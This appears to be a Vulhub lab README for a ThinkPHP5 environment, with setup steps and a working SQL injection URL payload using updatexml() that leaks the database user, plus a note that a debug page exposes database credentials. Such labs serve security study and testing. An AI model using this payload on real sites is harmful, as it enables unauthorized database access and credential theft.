Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
844 B
844 B
ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability
Rationale
Details to read the references:
Environment Setup
Enter the following command:
docker compose up -d
Visiting http://your-ip/index.php?ids[]=1&ids[]=2, you'll see the username is displayed, indicating that the environment is running successfully.
Exploit
Open the page http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,you will find messages revealed successfully:
And you can find the account and password of the database through the debug page.
This is another sensitive information disclosure vulnerability.